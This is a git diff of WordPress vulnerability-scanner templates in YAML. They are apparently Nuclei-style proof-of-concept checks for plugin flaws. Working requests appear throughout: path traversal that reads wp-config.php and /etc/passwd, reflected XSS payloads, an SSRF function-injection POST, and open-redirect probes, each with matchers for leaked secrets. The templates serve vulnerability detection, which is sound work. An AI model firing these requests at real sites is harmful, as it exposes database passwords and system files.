'{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-knews-xss-11487.yaml b/poc/wordpress/wp-knews-xss-11487.yaml deleted file mode 100644 index 94f404c685..0000000000 --- a/poc/wordpress/wp-knews-xss-11487.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-knews-xss -info: - name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: - - http://web.archive.org/web/20210213220043/https://www.securityfocus.com/bid/54330/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-knews-xss-11488.yaml b/poc/wordpress/wp-knews-xss-11488.yaml new file mode 100644 index 0000000000..9b0815e576 --- /dev/null +++ b/poc/wordpress/wp-knews-xss-11488.yaml @@ -0,0 +1,29 @@ +id: wp-knews-xss + +info: + name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/54330/info + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml b/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml index 42ab9af2c0..1471c0f2f8 100644 --- a/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml +++ b/poc/wordpress/wp-mailchimp-log-exposure-11494.yaml @@ -4,7 +4,7 @@ info: author: aashiq severity: medium description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content - tags: logs,wordpress,exposure,mailchimp + tags: logs,wordpress,exposure requests: - method: GET path: diff --git a/poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml b/poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml new file mode 100644 index 0000000000..ef99a48b91 --- /dev/null +++ b/poc/wordpress/wp-memphis-documents-library-lfi-11495.yaml @@ -0,0 +1,38 @@ +id: wp-memphis-documents-library-lfi + +info: + name: WordPress Memphis Document Library 3.1.5 - Local File Inclusion + author: 0x_Akoko + severity: high + description: WordPress Memphis Document Library 3.1.5 is vulnerable to local file inclusion. + reference: + - https://www.exploit-db.com/exploits/39593 + - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + max-request: 2 + tags: wpscan,wordpress,wp-plugin,lfi,edb + +http: + - method: GET + path: + - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php' + - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a004730450221008707935261327de30c608ad5ea25d1036fbc370dc12dced6f1675ad63040026202202f34a660baf89517b8e655fc539020172e721214cfbc9ae8b2447ab2ef4ff983:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml b/poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml index 844d6bf242..9cb61c8a9d 100644 --- a/poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml +++ b/poc/wordpress/wp-memphis-documents-library-lfi-11496.yaml @@ -3,11 +3,11 @@ info: name: WordPress Plugin Memphis Document Library 3.1.5 LFI author: 0x_Akoko severity: high - tags: wordpress,wp-plugin,lfi description: Arbitrary file download in Memphis Document Library 3.1.5 - reference: | + reference: - https://www.exploit-db.com/exploits/39593 - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f + tags: wordpress,wp-plugin,lfi requests: - method: GET path: diff --git a/poc/wordpress/wp-mstore-plugin-listing-11500.yaml b/poc/wordpress/wp-mstore-plugin-listing-11500.yaml new file mode 100644 index 0000000000..77a8115984 --- /dev/null +++ b/poc/wordpress/wp-mstore-plugin-listing-11500.yaml @@ -0,0 +1,30 @@ +id: wp-mstore-plugin-listing + +info: + name: Wordpress Plugin MStore API + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the mstore-api plugin. + metadata: + max-request: 1 + google-query: inurl:/wp-content/plugins/mstore-api/ + tags: wordpress,listing,wp-plugin + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mstore-api/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/mstore-api" + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402201c167b12dde8a2e224c39074bad196d4138ac6424b66c782950a121b035427e9022014040370921dffe68731e76f661227a0c9515014014b0b4c9930fac8726fa0b3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml b/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml index 4fe1fb2f7a..89e2aa0442 100644 --- a/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml +++ b/poc/wordpress/wp-multiple-theme-ssrf-11512.yaml @@ -1,5 +1,4 @@ id: wp-multiple-theme-ssrf - info: name: WordPress Multiple Themes - Unauthenticated Function Injection author: madrobot @@ -8,7 +7,6 @@ info: reference: - https://www.exploit-db.com/exploits/49327 - https://wpscan.com/vulnerability/10417 - requests: - raw: - | @@ -17,7 +15,6 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com - matchers-condition: and matchers: - type: word @@ -25,7 +22,6 @@ requests: - "Example Domain" - "protocol_version" part: body - - type: status status: - 200 diff --git a/poc/wordpress/wp-multiple-theme-ssrf-11513.yaml b/poc/wordpress/wp-multiple-theme-ssrf-11513.yaml new file mode 100644 index 0000000000..eb1b7bc7db --- /dev/null +++ b/poc/wordpress/wp-multiple-theme-ssrf-11513.yaml @@ -0,0 +1,27 @@ +id: wp-multiple-theme-ssrf +info: + name: WordPress Multiple Themes - Unauthenticated Function Injection + author: madrobot + severity: high + reference: + - https://www.exploit-db.com/exploits/49327 + - https://wpscan.com/vulnerability/10417 + tags: wordpress,rce,ssrf +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com + matchers-condition: and + matchers: + - type: word + words: + - "Example Domain" + - "protocol_version" + part: body + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-nextgen-xss-11516.yaml b/poc/wordpress/wp-nextgen-xss-11516.yaml index a91847e2b8..1a9dc549ba 100644 --- a/poc/wordpress/wp-nextgen-xss-11516.yaml +++ b/poc/wordpress/wp-nextgen-xss-11516.yaml @@ -4,7 +4,7 @@ info: author: daffainfo severity: medium reference: - - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info + - https://www.securityfocus.com/bid/57200/info tags: wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/wordpress/wp-phpfreechat-xss-11524.yaml b/poc/wordpress/wp-phpfreechat-xss-11524.yaml deleted file mode 100644 index 077f6e51e9..0000000000 --- a/poc/wordpress/wp-phpfreechat-xss-11524.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wp-phpfreechat-xss -info: - name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.securityfocus.com/bid/54332/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-phpfreechat-xss-11527.yaml b/poc/wordpress/wp-phpfreechat-xss-11527.yaml index 6deb475d0b..077f6e51e9 100644 --- a/poc/wordpress/wp-phpfreechat-xss-11527.yaml +++ b/poc/wordpress/wp-phpfreechat-xss-11527.yaml @@ -1,30 +1,24 @@ id: wp-phpfreechat-xss - info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - https://www.securityfocus.com/bid/54332/info + reference: https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-phpfreechat-xss-11528.yaml b/poc/wordpress/wp-phpfreechat-xss-11528.yaml index 24ca07abfb..ef3aa1dea3 100644 --- a/poc/wordpress/wp-phpfreechat-xss-11528.yaml +++ b/poc/wordpress/wp-phpfreechat-xss-11528.yaml @@ -4,7 +4,7 @@ info: author: daffainfo severity: medium reference: - - https://www.securityfocus.com/bid/54332/info + - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml b/poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml new file mode 100644 index 0000000000..91a4896fe7 --- /dev/null +++ b/poc/wordpress/wp-plugin-1-flashgallery-listing-11530.yaml @@ -0,0 +1,27 @@ +id: wp-plugin-1-flashgallery-listing + +info: + name: WordPress 1 flash gallery listing + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6978 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/1-flash-gallery/" + - "{{BaseURL}}/blog/wp-content/plugins/1-flash-gallery/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/1-flash-gallery" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml b/poc/wordpress/wp-plugin-1-flashgallery-listing.yaml similarity index 100% rename from poc/wordpress/wp-plugin-1-flashgallery-listing-11531.yaml rename to poc/wordpress/wp-plugin-1-flashgallery-listing.yaml diff --git a/poc/wordpress/wp-plugin-utlimate-member-11541.yaml b/poc/wordpress/wp-plugin-utlimate-member-11541.yaml index f659152483..b29cf80ad3 100644 --- a/poc/wordpress/wp-plugin-utlimate-member-11541.yaml +++ b/poc/wordpress/wp-plugin-utlimate-member-11541.yaml @@ -2,11 +2,10 @@ id: wordpress-plugins-ultimate-member info: name: WordPress Plugin Ultimate Member author: pussycat0x - severity: info + severity: low description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6998 - tags: wordpress,listing,plugin + reference: https://www.exploit-db.com/ghdb/6998 + tags: wordpress,listing requests: - method: GET path: diff --git a/poc/wordpress/wp-plugin-utlimate-member.yaml b/poc/wordpress/wp-plugin-utlimate-member-11542.yaml similarity index 100% rename from poc/wordpress/wp-plugin-utlimate-member.yaml rename to poc/wordpress/wp-plugin-utlimate-member-11542.yaml diff --git a/poc/wordpress/wp-popup-listing.yaml b/poc/wordpress/wp-popup-listing-11543.yaml similarity index 100% rename from poc/wordpress/wp-popup-listing.yaml rename to poc/wordpress/wp-popup-listing-11543.yaml diff --git a/poc/wordpress/wp-popup-listing-11545.yaml b/poc/wordpress/wp-popup-listing-11545.yaml index 06a3982bd6..5ad9dd4aed 100644 --- a/poc/wordpress/wp-popup-listing-11545.yaml +++ b/poc/wordpress/wp-popup-listing-11545.yaml @@ -1,21 +1,29 @@ id: wordpress-popup-listing + info: name: WordPress Popup Plugin Directory Listing author: aashiq severity: info description: Searches for sensitive directories present in the wordpress-popup plugin. + metadata: + max-request: 1 tags: wordpress,listing,plugin -requests: + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Index of" - "/wp-content/plugins/wordpress-popup/views/admin" condition: and + +# digest: 4b0a00483046022100c2411afae73fdffc85b85ee5fbef8243d44339d64e495474f70aff573b316898022100d49b0212098b864b1b99aa662908b1a775ac28f4319ea5da7ea7294771c2bbf8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-prostore-open-redirect-11546.yaml b/poc/wordpress/wp-prostore-open-redirect-11546.yaml deleted file mode 100644 index 5d31d50aae..0000000000 --- a/poc/wordpress/wp-prostore-open-redirect-11546.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: wp-prostore-open-redirect -info: - name: WordPress ProStore Themes 1.1.2 Open Redirection - author: 0x_Akoko - description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc - severity: low - tags: wordpress,wp-theme,redirect -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/poc/wordpress/wp-prostore-open-redirect-11549.yaml b/poc/wordpress/wp-prostore-open-redirect-11549.yaml index 9916d6c3f2..b10f1286b0 100644 --- a/poc/wordpress/wp-prostore-open-redirect-11549.yaml +++ b/poc/wordpress/wp-prostore-open-redirect-11549.yaml @@ -1,20 +1,18 @@ id: wp-prostore-open-redirect - info: name: WordPress ProStore Themes 1.1.2 Open Redirection author: 0x_Akoko - description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc severity: low + description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. + reference: + - https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc tags: wordpress,wp-theme,redirect - requests: - method: GET path: - - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" - + - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + part: header diff --git a/poc/wordpress/wp-prostore-open-redirect-11550.yaml b/poc/wordpress/wp-prostore-open-redirect-11550.yaml new file mode 100644 index 0000000000..9916d6c3f2 --- /dev/null +++ b/poc/wordpress/wp-prostore-open-redirect-11550.yaml @@ -0,0 +1,20 @@ +id: wp-prostore-open-redirect + +info: + name: WordPress ProStore Themes 1.1.2 Open Redirection + author: 0x_Akoko + description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. + reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc + severity: low + tags: wordpress,wp-theme,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header \ No newline at end of file diff --git a/poc/wordpress/wp-qards-listing-11552.yaml b/poc/wordpress/wp-qards-listing-11552.yaml deleted file mode 100644 index 0888ca8567..0000000000 --- a/poc/wordpress/wp-qards-listing-11552.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: wp-qards-listing -info: - name: WordPress Plugin Qards - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - tags: wordpress,listing,wp-plugin,wp -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/qards/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/qards" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-qards-listing.yaml b/poc/wordpress/wp-qards-listing.yaml new file mode 100644 index 0000000000..b9ba98785d --- /dev/null +++ b/poc/wordpress/wp-qards-listing.yaml @@ -0,0 +1,25 @@ +id: wp-qards-listing + +info: + name: WordPress Plugin Qards + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + tags: wordpress,listing,wp-plugin,wp + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/qards/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/qards" + condition: and + + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-revslider-file-download-11554.yaml b/poc/wordpress/wp-revslider-file-download-11554.yaml new file mode 100644 index 0000000000..35aa96c8ed --- /dev/null +++ b/poc/wordpress/wp-revslider-file-download-11554.yaml @@ -0,0 +1,29 @@ +id: wp-revslider-file-download +info: + name: Wordpress Revslider - Unauthenticated Arbitrary File Download + author: pussycat0x + severity: high + description: The Vulnerable Revslider WordPress plugin was affected by an unauthenticated download vulnerability,This could result in attacker downloading the wp-config.php file. + reference: + - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html + - https://cxsecurity.com/issue/WLB-2021090129 + metadata: + google-dork: inurl:/wp-content/plugins/revslider + tags: wordpress,wp-plugin,lfi,revslider +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' + - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'DB_NAME'" + - "'DB_PASSWORD'" + - "'DB_USER'" + condition: and + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-revslider-file-download.yaml b/poc/wordpress/wp-revslider-file-download.yaml index 35aa96c8ed..a2c97e0a18 100644 --- a/poc/wordpress/wp-revslider-file-download.yaml +++ b/poc/wordpress/wp-revslider-file-download.yaml @@ -1,20 +1,27 @@ id: wp-revslider-file-download + info: - name: Wordpress Revslider - Unauthenticated Arbitrary File Download + name: Wordpress Revslider - Local File Inclusion author: pussycat0x severity: high - description: The Vulnerable Revslider WordPress plugin was affected by an unauthenticated download vulnerability,This could result in attacker downloading the wp-config.php file. + description: WordPress Revslider is affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file. reference: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 metadata: google-dork: inurl:/wp-content/plugins/revslider tags: wordpress,wp-plugin,lfi,revslider + requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' + matchers-condition: and matchers: - type: word @@ -24,6 +31,9 @@ requests: - "'DB_PASSWORD'" - "'DB_USER'" condition: and + - type: status status: - 200 + +# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/wp-securimage-xss-11556.yaml b/poc/wordpress/wp-securimage-xss-11556.yaml new file mode 100644 index 0000000000..53a24f1671 --- /dev/null +++ b/poc/wordpress/wp-securimage-xss-11556.yaml @@ -0,0 +1,24 @@ +id: wp-securimage-xss +info: + name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.securityfocus.com/bid/59816/info + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-securimage-xss-11559.yaml b/poc/wordpress/wp-securimage-xss-11559.yaml index 081d25ceec..7b313f46d3 100644 --- a/poc/wordpress/wp-securimage-xss-11559.yaml +++ b/poc/wordpress/wp-securimage-xss-11559.yaml @@ -4,7 +4,7 @@ info: author: daffainfo severity: medium reference: - - https://www.securityfocus.com/bid/59816/info + - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info tags: wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/wordpress/wp-securimage-xss-11560.yaml b/poc/wordpress/wp-securimage-xss-11560.yaml deleted file mode 100644 index 7b313f46d3..0000000000 --- a/poc/wordpress/wp-securimage-xss-11560.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-securimage-xss -info: - name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: - - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-sfwd-lms-listing-11562.yaml b/poc/wordpress/wp-sfwd-lms-listing-11564.yaml similarity index 100% rename from poc/wordpress/wp-sfwd-lms-listing-11562.yaml rename to poc/wordpress/wp-sfwd-lms-listing-11564.yaml diff --git a/poc/wordpress/wp-sfwd-lms-listing-11565.yaml b/poc/wordpress/wp-sfwd-lms-listing-11565.yaml index 62267327ee..adbac15377 100644 --- a/poc/wordpress/wp-sfwd-lms-listing-11565.yaml +++ b/poc/wordpress/wp-sfwd-lms-listing-11565.yaml @@ -4,8 +4,7 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6426 + reference: https://www.exploit-db.com/ghdb/6426 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wp-simple-fields-lfi-11566.yaml b/poc/wordpress/wp-simple-fields-lfi-11566.yaml index 52b531d8ba..e55a9a7d30 100644 --- a/poc/wordpress/wp-simple-fields-lfi-11566.yaml +++ b/poc/wordpress/wp-simple-fields-lfi-11566.yaml @@ -1,25 +1,16 @@ id: wp-simple-fields-lfi - info: - name: WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE + name: WordPress Plugin Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE author: 0x240x23elu severity: high - description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution. - reference: - - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html - metadata: - max-request: 1 - tags: wp-plugin,lfi,packetstorm,wordpress - -http: + reference: https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html + tags: wordpress,wp-plugin,lfi +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" - matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" part: body - -# digest: 4a0a00473045022100ef08afd8363510ffe9fe413cb68346ce3e3d8bdb892387a0d67b6f071e20449102205e53317445d38cb9f3b5cc9b74f17644e697b5e1e759462f075e5742a90b5ad7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-simple-fields-lfi-11569.yaml b/poc/wordpress/wp-simple-fields-lfi-11569.yaml deleted file mode 100644 index 61752d0cfb..0000000000 --- a/poc/wordpress/wp-simple-fields-lfi-11569.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: wp-simple-fields-lfi -info: - name: WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE - author: 0x240x23elu - severity: high - description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution. - reference: - - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html - tags: wordpress,wp-plugin,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - -# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/wp-slideshow-xss-11572.yaml b/poc/wordpress/wp-slideshow-xss-11572.yaml deleted file mode 100644 index 0396c00a98..0000000000 --- a/poc/wordpress/wp-slideshow-xss-11572.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: wp-slideshow-xss -info: - name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.exploit-db.com/exploits/37948 - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-slideshow-xss-11574.yaml b/poc/wordpress/wp-slideshow-xss-11574.yaml new file mode 100644 index 0000000000..2b851c9f5b --- /dev/null +++ b/poc/wordpress/wp-slideshow-xss-11574.yaml @@ -0,0 +1,29 @@ +id: wp-slideshow-xss +info: + name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://www.exploit-db.com/exploits/37948 + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-socialfit-xss-11577.yaml b/poc/wordpress/wp-socialfit-xss-11577.yaml index 0bd0b67947..61f70d16de 100644 --- a/poc/wordpress/wp-socialfit-xss-11577.yaml +++ b/poc/wordpress/wp-socialfit-xss-11577.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3Cscript%3Ealert%281%29%3C/script%3E' + - '{{BaseURL}}/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - - '' + - '' - type: word part: header words: diff --git a/poc/wordpress/wp-super-forms-11585.yaml b/poc/wordpress/wp-super-forms-11585.yaml index ce1f4ad2b4..febe3675a0 100644 --- a/poc/wordpress/wp-super-forms-11585.yaml +++ b/poc/wordpress/wp-super-forms-11585.yaml @@ -1,16 +1,21 @@ id: wordpress-super-forms + info: - name: WordPress super-forms + name: WordPress super-forms Plugin Directory Listing author: pussycat0x severity: low - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6776 - 